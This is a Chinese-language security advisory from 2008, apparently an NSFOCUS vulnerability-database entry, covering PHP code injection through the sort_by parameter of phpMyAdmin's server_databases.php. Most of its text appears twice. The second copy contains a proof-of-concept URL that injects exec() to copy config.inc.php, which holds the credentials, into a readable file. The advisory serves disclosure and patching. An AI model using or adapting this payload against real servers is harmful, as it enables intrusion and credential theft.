发布日期:2008-09-15
更新日期:2008-09-17
受影响系统:
phpMyAdmin phpMyAdmin < 2.11.9.1
不受影响系统:
phpMyAdmin phpMyAdmin 2.11.9.1
描述:BUGTRAQ ID: 31188
phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。
phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。
<*来源:Norman Hippert
链接:http://secunia.com/advisories/31884
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
http://fd.the-wildcat.de/pma_e36a091q11.php
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
建议:厂商补丁:
phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin
from:http://www.nsfocus.net/vulndb/12387 >*来源:norman>
更新日期:2008-09-17
受影响系统:
phpMyAdmin phpMyAdmin < 2.11.9.1
不受影响系统:
phpMyAdmin phpMyAdmin 2.11.9.1
描述:BUGTRAQ ID: 31188
phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。
phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。
<*来源:Norman Hippert
链接:http://secunia.com/advisories/31884
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
http://fd.the-wildcat.de/pma_e36a091q11.php
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
建议:厂商补丁:
phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin
from:http://www.nsfocus.net/vulndb/12387 >*来源:norman>
1、用户必须先登陆进去,才可以攻击。